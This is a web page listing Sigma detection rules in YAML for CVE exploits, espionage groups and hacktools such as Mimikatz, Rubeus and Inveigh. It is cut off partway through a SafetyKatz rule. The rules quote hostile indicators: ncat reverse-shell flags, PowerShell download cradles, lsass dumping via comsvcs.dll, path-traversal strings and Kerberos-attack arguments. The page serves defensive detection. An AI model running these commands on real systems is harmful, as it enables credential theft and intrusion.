Sigma (generic) detection rules
3,750 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
Detection rules
50 shown of 3,750
critical
Exploit for CVE-2015-1641
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641

Sigma YAML:
title: Exploit for CVE-2015-1641
id: 7993792c-5ce2-4475-a3db-a3a5539827ef
status: stable
description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
references:
    - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
    - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2018-02-22
modified: 2021-11-27
tags:
    - attack.stealth
    - attack.t1036.005
    - cve.2015-1641
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\MicroScMgmt.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Exploit for CVE-2017-8759
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759

Sigma YAML:
title: Exploit for CVE-2017-8759
id: fdd84c68-a1f6-47c9-9477-920584f94905
status: test
description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
references:
    - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
    - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-09-15
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1203
    - attack.t1204.002
    - attack.initial-access
    - attack.t1566.001
    - cve.2017-8759
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\csc.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Exploiting CVE-2019-1388
Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM

Sigma YAML:
title: Exploiting CVE-2019-1388
id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
status: stable
description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
references:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
    - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
author: Florian Roth (Nextron Systems)
date: 2019-11-20
modified: 2024-12-01
tags:
    - attack.privilege-escalation
    - attack.t1068
    - cve.2019-1388
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        ParentImage|endswith: '\consent.exe'
        Image|endswith: '\iexplore.exe'
        CommandLine|contains: ' http'
    selection_rights:
        - IntegrityLevel:
              - 'System' # for Sysmon users
              - 'S-1-16-16384' # System
        - User|contains: # covers many language settings
              - 'AUTHORI'
              - 'AUTORI'
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical
critical
FlowCloud Registry Markers
Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.

Sigma YAML:
title: FlowCloud Registry Markers
id: 5118765f-6657-4ddb-a487-d7bd673abbf1
status: test
description: |
    Detects FlowCloud malware registry markers from threat group TA410.
    The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
author: NVISO
date: 2020-06-09
modified: 2024-03-20
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_event
detection:
    selection:
        TargetObject|contains:
            - '\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}'
            - '\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'
            - '\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'
            - '\SYSTEM\Setup\PrintResponsor\'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
FoggyWeb Backdoor DLL Loading
Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll" DLL

Sigma YAML:
title: FoggyWeb Backdoor DLL Loading
id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c
status: test
description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
references:
    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Florian Roth (Nextron Systems)
date: 2021-09-27
modified: 2022-12-09
tags:
    - attack.resource-development
    - attack.t1587
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded: 'C:\Windows\ADFS\version.dll'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Fortinet CVE-2018-13379 Exploitation
Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs

Sigma YAML:
title: Fortinet CVE-2018-13379 Exploitation
id: a2e97350-4285-43f2-a63f-d0daff291738
status: test
description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
references:
    - https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
author: Bhabesh Raj
date: 2020-12-08
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2018-13379
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains|all:
            - 'lang=/../../'
            - '/dev/cmdb/sslvpn_websession'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Fortinet CVE-2021-22123 Exploitation
Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs

Sigma YAML:
title: Fortinet CVE-2021-22123 Exploitation
id: f425637f-891c-4191-a6c4-3bb1b70513b4
status: test
description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
references:
    - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection
author: Bhabesh Raj, Florian Roth
date: 2021-08-19
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-22123
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains: '/api/v2.0/user/remoteserver.saml'
        cs-method: POST
    filter1:
        cs-referer|contains: '/root/user/remote-user/saml-user/'
    filter2:
        cs-referer: null
    condition: selection and not filter1 and not filter2
falsepositives:
    - Unknown
level: critical
critical
Goofy Guineapig Backdoor Service Creation
Detects service creation persistence used by the Goofy Guineapig backdoor

Sigma YAML:
title: Goofy Guineapig Backdoor Service Creation
id: 8c15dd74-9570-4f48-80b2-29996fd91ee6
status: test
description: Detects service creation persistence used by the Goofy Guineapig backdoor
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-15
tags:
    - attack.persistence
    - detection.emerging-threats
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: 'GoogleUpdate'
        ImagePath|contains|all:
            - 'rundll32'
            - 'FileProtocolHandler'
            - '\ProgramData\GoogleUpdate\GoogleUpdate.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Grafana Path Traversal Exploitation CVE-2021-43798
Detects a successful Grafana path traversal exploitation

Sigma YAML:
title: Grafana Path Traversal Exploitation CVE-2021-43798
id: 7b72b328-5708-414f-9a2a-6a6867c26e16
status: test
description: Detects a successful Grafana path traversal exploitation
references:
    - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
    - https://github.com/search?q=CVE-2021-43798
author: Florian Roth (Nextron Systems)
date: 2021-12-08
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-43798
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection_traversal:
        cs-uri-query|contains: '/../../../../../../../'
        sc-status: 200
    selection_plugins:
        cs-uri-query|contains:
            - '/public/plugins/live'
            - '/public/plugins/icon'
            - '/public/plugins/loki'
            - '/public/plugins/text'
            - '/public/plugins/logs'
            - '/public/plugins/news'
            - '/public/plugins/stat'
            - '/public/plugins/mssql'
            - '/public/plugins/mixed'
            - '/public/plugins/mysql'
            - '/public/plugins/tempo'
            - '/public/plugins/graph'
            - '/public/plugins/gauge'
            - '/public/plugins/table'
            - '/public/plugins/debug'
            - '/public/plugins/zipkin'
            - '/public/plugins/jaeger'
            - '/public/plugins/geomap'
            - '/public/plugins/canvas'
            - '/public/plugins/grafana'
            - '/public/plugins/welcome'
            - '/public/plugins/xychart'
            - '/public/plugins/heatmap'
            - '/public/plugins/postgres'
            - '/public/plugins/testdata'
            - '/public/plugins/opentsdb'
            - '/public/plugins/influxdb'
            - '/public/plugins/barchart'
            - '/public/plugins/annolist'
            - '/public/plugins/bargauge'
            - '/public/plugins/graphite'
            - '/public/plugins/dashlist'
            - '/public/plugins/piechart'
            - '/public/plugins/dashboard'
            - '/public/plugins/nodeGraph'
            - '/public/plugins/alertlist'
            - '/public/plugins/histogram'
            - '/public/plugins/table-old'
            - '/public/plugins/pluginlist'
            - '/public/plugins/timeseries'
            - '/public/plugins/cloudwatch'
            - '/public/plugins/prometheus'
            - '/public/plugins/stackdriver'
            - '/public/plugins/alertGroups'
            - '/public/plugins/alertmanager'
            - '/public/plugins/elasticsearch'
            - '/public/plugins/gettingstarted'
            - '/public/plugins/state-timeline'
            - '/public/plugins/status-history'
            - '/public/plugins/grafana-clock-panel'
            - '/public/plugins/grafana-simple-json-datasource'
            - '/public/plugins/grafana-azure-monitor-datasource'
    condition: all of selection*
falsepositives:
    - Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error
level: critical
critical
Greenbug Espionage Group Indicators
Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec

Sigma YAML:
title: Greenbug Espionage Group Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: test
description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
references:
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth (Nextron Systems)
date: 2020-05-20
modified: 2023-03-09
tags:
    - attack.stealth
    - attack.g0049
    - attack.execution
    - attack.t1059.001
    - attack.command-and-control
    - attack.t1105
    - attack.t1036.005
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - ':\ProgramData\adobe\Adobe.exe'
            - ':\ProgramData\oracle\local.exe'
            - '\revshell.exe'
            - '\infopagesbackup\ncat.exe'
            - ':\ProgramData\comms\comms.exe'
    selection_msf:
        CommandLine|contains|all:
            - '-ExecutionPolicy Bypass -File'
            - '\msf.ps1'
    selection_ncat:
        CommandLine|contains|all:
            - 'infopagesbackup'
            - '\ncat'
            - '-e cmd.exe'
    selection_powershell:
        CommandLine|contains:
            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
            - '-nop -w hidden -c $k=new-object'
            - '[Net.CredentialCache]::DefaultCredentials;IEX '
            - ' -nop -w hidden -c $m=new-object net.webclient;$m'
            - '-noninteractive -executionpolicy bypass whoami'
            - '-noninteractive -executionpolicy bypass netstat -a'
    selection_other:
        CommandLine|contains: 'L3NlcnZlcj1' # base64 encoded '/server='
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
Griffon Malware Attack Pattern
Detects process execution patterns related to Griffon malware as reported by Kaspersky

Sigma YAML:
title: Griffon Malware Attack Pattern
id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
status: test
description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
references:
    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\local\temp\'
            - '//b /e:jscript'
            - '.txt'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HAFNIUM Exchange Exploitation Activity
Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers

Sigma YAML:
title: HAFNIUM Exchange Exploitation Activity
id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
status: test
description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
references:
    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
    - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
    - https://twitter.com/BleepinComputer/status/1372218235949617161
author: Florian Roth (Nextron Systems)
date: 2021-03-09
modified: 2023-03-09
tags:
    - attack.privilege-escalation
    - attack.execution
    - attack.persistence
    - attack.t1546
    - attack.t1053
    - attack.g0125
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_attrib:
        CommandLine|contains|all:
            - 'attrib'
            - ' +h '
            - ' +s '
            - ' +r '
            - '.aspx'
    selection_vsperfmon:
        - Image|contains: '\ProgramData\VSPerfMon\'
        - CommandLine|contains|all:
              - 'schtasks'
              - 'VSPerfMon'
    selection_opera_1:
        Image|endswith: 'Opera_browser.exe'
        ParentImage|endswith:
            - '\services.exe'
            - '\svchost.exe'
    selection_opera_2:
        Image|endswith: 'Users\Public\opera\Opera_browser.exe'
    selection_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin list shadows'
            - 'Temp\__output'
    selection_makecab_1:
        Image|endswith: '\makecab.exe'
        CommandLine|contains|all:
            - 'inetpub\wwwroot\'
            - '.dmp.zip'
    selection_makecab_2:
        Image|endswith: '\makecab.exe'
        CommandLine|contains:
            - 'Microsoft\Exchange Server\'
            - 'compressionmemory'
            - '.gif'
    selection_7zip:
        CommandLine|contains|all:
            - ' -t7z '
            - 'C:\Programdata\pst'
            - '\it.zip'
    selection_rundll32:
        CommandLine|contains|all:
            - '\comsvcs.dll'
            - 'Minidump'
            - 'full '
            - '\inetpub\wwwroot'
    selection_other:
        CommandLine|contains:
            - 'Windows\Temp\xx.bat'
            - 'Windows\WwanSvcdcs'
            - 'Windows\Temp\cw.exe'
    condition: 1 of selection*
falsepositives:
    - Unlikely
level: critical
critical
HackTool - BabyShark Agent Default URL Pattern
Detects Baby Shark C2 Framework default communication patterns

Sigma YAML:
title: HackTool - BabyShark Agent Default URL Pattern
id: 304810ed-8853-437f-9e36-c4975c3dfd7e
status: test
description: Detects Baby Shark C2 Framework default communication patterns
references:
    - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
author: Florian Roth (Nextron Systems)
date: 2021-06-09
modified: 2024-02-15
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: proxy
detection:
    selection:
        c-uri|contains: 'momyshark\?key='
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Credential Dumping Tools Named Pipe Created
Detects well-known credential dumping tools execution via specific named pipe creation

Sigma YAML:
title: HackTool - Credential Dumping Tools Named Pipe Created
id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
status: test
description: Detects well-known credential dumping tools execution via specific named pipe creation
references:
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
    - https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
author: Teymur Kheirkhabarov, oscd.community
date: 2019-11-01
modified: 2023-08-07
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.t1003.002
    - attack.t1003.004
    - attack.t1003.005
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\cachedump'
            - '\lsadump'
            - '\wceservicepipe'
    condition: selection
falsepositives:
    - Legitimate Administrator using tool for password recovery
level: critical
critical
HackTool - DInjector PowerShell Cradle Execution
Detects the use of the Dinject PowerShell cradle based on the specific flags

Sigma YAML:
title: HackTool - DInjector PowerShell Cradle Execution
id: d78b5d61-187d-44b6-bf02-93486a80de5a
status: test
description: Detects the use of the Dinject PowerShell cradle based on the specific flags
references:
    - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' /am51'
            - ' /password'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - DiagTrackEoP Default Named Pipe
Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.

Sigma YAML:
title: HackTool - DiagTrackEoP Default Named Pipe
id: 1f7025a6-e747-4130-aac4-961eb47015f1
status: test
description: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
references:
    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-03
modified: 2023-08-07
tags:
    - attack.privilege-escalation
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains: 'thisispipe' # Based on source code
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Dumpert Process Dumper Default File
Detects the creation of the default dump file used by the Outflank Dumpert tool, a process dumper that dumps the lsass process memory

Sigma YAML:
title: HackTool - Dumpert Process Dumper Default File
id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
related:
    - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
      type: derived
status: test
description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2023-05-09
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: 'dumpert.dmp'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Dumpert Process Dumper Execution
Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

Sigma YAML:
title: HackTool - Dumpert Process Dumper Execution
id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
status: test
description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2025-01-22
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Hashes|contains: 'MD5=09D278F9DE118EF09163C6140255C690'
        - CommandLine|contains: 'Dumpert.dll'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Empire PowerShell UAC Bypass
Detects some Empire PowerShell UAC bypass methods

Sigma YAML:
title: HackTool - Empire PowerShell UAC Bypass
id: 3268b746-88d8-4cd3-bffc-30077d02c787
status: stable
description: Detects some Empire PowerShell UAC bypass methods
references:
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
author: Ecco
date: 2019-08-30
modified: 2023-02-21
tags:
    - attack.privilege-escalation
    - attack.t1548.002
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
            - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - F-Secure C3 Load by Rundll32
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

Sigma YAML:
title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
    - https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'rundll32.exe'
            - '.dll'
            - 'StartNodeRelay'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Inveigh Execution
Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool

Sigma YAML:
title: HackTool - Inveigh Execution
id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
status: test
description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
references:
    - https://github.com/Kevin-Robertson/Inveigh
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Inveigh.exe'
        - OriginalFileName:
              - '\Inveigh.exe'
              - '\Inveigh.dll'
        - Description: 'Inveigh'
        - CommandLine|contains:
              - ' -SpooferIP'
              - ' -ReplyToIPs '
              - ' -ReplyToDomains '
              - ' -ReplyToMACs '
              - ' -SnifferIP'
    condition: selection
falsepositives:
    - Very unlikely
level: critical
critical
HackTool - Inveigh Execution Artefacts
Detects the presence and execution of Inveigh via dropped artefacts

Sigma YAML:
title: HackTool - Inveigh Execution Artefacts
id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
status: test
description: Detects the presence and execution of Inveigh via dropped artefacts
references:
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2024-06-27
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\Inveigh-Log.txt'
            - '\Inveigh-Cleartext.txt'
            - '\Inveigh-NTLMv1Users.txt'
            - '\Inveigh-NTLMv2Users.txt'
            - '\Inveigh-NTLMv1.txt'
            - '\Inveigh-NTLMv2.txt'
            - '\Inveigh-FormInput.txt'
            - '\Inveigh.dll'
            - '\Inveigh.exe'
            - '\Inveigh.ps1'
            - '\Inveigh-Relay.ps1'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Koh Default Named Pipe
Detects creation of default named pipes used by the Koh tool

Sigma YAML:
title: HackTool - Koh Default Named Pipe
id: 0adc67e0-a68f-4ffd-9c43-28905aad5d6a
status: test
description: Detects creation of default named pipes used by the Koh tool
references:
    - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-08
modified: 2023-08-07
tags:
    - attack.privilege-escalation
    - attack.credential-access
    - attack.stealth
    - attack.t1528
    - attack.t1134.001
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\imposecost'
            - '\imposingcost'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - Mimikatz Kirbi File Creation
Detects files created by mimikatz, such as ".kirbi" tickets and "mimilsa.log".

Sigma YAML:
title: HackTool - Mimikatz Kirbi File Creation
id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
related:
    - id: 034affe8-6170-11ec-844f-0f78aa0c4d66
      type: obsolete
status: test
description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
references:
    - https://cobalt.io/blog/kerberoast-attack-techniques
    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: Florian Roth (Nextron Systems), David ANDRE
date: 2021-11-08
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1558
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith:
            - '.kirbi' # Kerberos tickets
            - 'mimilsa.log' # MemSSP default file
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - PurpleSharp Execution
Detects the execution of the PurpleSharp adversary simulation tool

Sigma YAML:
title: HackTool - PurpleSharp Execution
id: ff23ffbc-3378-435e-992f-0624dcf93ab4
status: test
description: Detects the execution of the PurpleSharp adversary simulation tool
references:
    - https://github.com/mvelazc0/PurpleSharp
author: Florian Roth (Nextron Systems)
date: 2021-06-18
modified: 2023-02-05
tags:
    - attack.t1587
    - attack.resource-development
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|contains: '\purplesharp'
        - OriginalFileName: 'PurpleSharp.exe'
    selection_cli:
        CommandLine|contains:
            - 'xyz123456.exe'
            - 'PurpleSharp'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
HackTool - QuarksPwDump Dump File
Detects a dump file written by QuarksPwDump password dumper

Sigma YAML:
title: HackTool - QuarksPwDump Dump File
id: 847def9e-924d-4e90-b7c4-5f581395a2b4
status: test
description: Detects a dump file written by QuarksPwDump password dumper
references:
    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
author: Florian Roth (Nextron Systems)
date: 2018-02-10
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1003.002
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains|all:
            - '\AppData\Local\Temp\SAM-'
            - '.dmp'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
HackTool - Rubeus Execution
Detects the execution of the hacktool Rubeus via PE information or command line parameters

Sigma YAML:
title: HackTool - Rubeus Execution
id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
related:
    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
      type: similar
status: stable
description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
references:
    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus
    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
    - https://github.com/GhostPack/Rubeus
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-04-20
tags:
    - attack.credential-access
    - attack.t1003
    - attack.t1558.003
    - attack.lateral-movement
    - attack.t1550.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Rubeus.exe'
        - OriginalFileName: 'Rubeus.exe'
        - Description: 'Rubeus'
        - CommandLine|contains:
              - 'asreproast '
              - 'dump /service:krbtgt '
              - 'dump /luid:0x'
              - 'kerberoast '
              - 'createnetonly /program:'
              - 'ptt /ticket:'
              - '/impersonateuser:'
              - 'renew /ticket:'
              - 'asktgt /user:'
              - 'harvest /interval:'
              - 's4u /user:'
              - 's4u /ticket:'
              - 'hash /password:'
              - 'golden /aes256:'
              - 'silver /user:'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SafetyKatz Execution
Detects the execution of the hacktool SafetyKatz via PE information and default Image name

Sigma YAML:
title: HackTool - SafetyKatz Execution
